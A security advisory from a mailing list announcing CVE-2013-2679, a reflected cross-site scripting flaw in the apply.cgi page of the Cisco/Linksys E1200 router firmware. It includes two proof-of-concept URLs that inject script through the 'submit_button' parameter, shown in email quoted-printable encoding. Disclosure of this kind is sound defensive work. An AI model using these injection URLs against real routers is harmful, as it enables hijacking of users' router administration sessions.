Mitre has assigned the following CVE for this issue:
CVE-2013-2679
On Mon, Apr 29, 2013 at 12:27 AM, Carl Benedict
<theinfinitenigma@gmail.com> wrote:
> Summary
> --------------------
> Software : Cisco/Linksys Router OS
> Hardware : E1200 N300 (others currently untested)
> Version : 2.0.04 (others currently untested)
> Website : http://www.linksys.com
> Issue : Reflected XSS
> Severity : Medium
> Researcher: Carl Benedict (theinfinitenigma)
>
> Product Description
> --------------------
> The Cisco/Linksys E1200 N300 is a consumer-grade router, wireless access =
point, and 10/100 switch.
>
> Details
> --------------------
> The apply.cgi page, which backs all HTML forms on the device, is vulnerab=
le to reflected XSS via the 'submit_button' parameter. The vulnerability is=
caused due to a lack of input validation and poor/missing server side vali=
dation checks. This attack requires an authenticated session. This applicat=
ion uses HTTP basic authentication. Because of this, there is no session, w=
hich increases the likelihood of this attack being successful.
>
> Sample URL #1 (HTTP GET request):
>
> http://192.168.1.1/apply.cgi?submit_button=3D%27%3b%20%3C%2fscript%3E%3Cs=
cript%3Ealert%281%29%3C%2fscript%3E%20%27
>
> Sample URL #2 (HTTP GET request):
>
> http://192.168.1.1/apply.cgi?submit_button=3Dindex%27%3b%20%3c%2f%73%63%7=
2%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%7=
2%69%70%74%3e%20%27&change_action=3D&submit_type=3D&action=3DApply&now_prot=
o=3Ddhcp&daylight_time=3D1&switch_mode=3D0&hnap_devicename=3DCisco10002&nee=
d_reboot=3D0&user_language=3D&wait_time=3D0&dhcp_start=3D100&dhcp_start_con=
flict=3D0&lan_ipaddr=3D4&ppp_demand_pppoe=3D9&ppp_demand_pptp=3D9&ppp_deman=
d_l2tp=3D9&ppp_demand_hb=3D9&wan_ipv6_proto=3Ddhcp-tunnel&detect_lang=3DEN&=
wan_proto=3Ddhcp&wan_hostname=3D&wan_domain=3D&mtu_enable=3D0&lan_ipaddr_0=
=3D192&lan_ipaddr_1=3D168&lan_ipaddr_2=3D1&lan_ipaddr_3=3D1&lan_netmask=3D2=
55.255.255.0&machine_name=3DCisco10002&lan_proto=3Ddhcp&dhcp_check=3D&dhcp_=
start_tmp=3D100&dhcp_num=3D50&dhcp_lease=3D0&wan_dns=3D4&wan_dns0_0=3D0&wan=
_dns0_1=3D0&wan_dns0_2=3D0&wan_dns0_3=3D0&wan_dns1_0=3D0&wan_dns1_1=3D0&wan=
_dns1_2=3D0&wan_dns1_3=3D0&wan_dns2_0=3D0&wan_dns2_1=3D0&wan_dns2_2=3D0&wan=
_dns2_3=3D0&wan_wins=3D4&wan_wins_0=3D0&wan_wins_1=3D0&wan_wins_2=3D0&wan_w=
ins_3=3D0&time_zone=3D-08+1+1&_daylight_time=3D1
>
> History
> --------------------
> 04/26/2013 : Discovery
> 04/27/2013 : Advisory released
>
>
> --
> =E2=88=9E
--=20
=E2=88=9E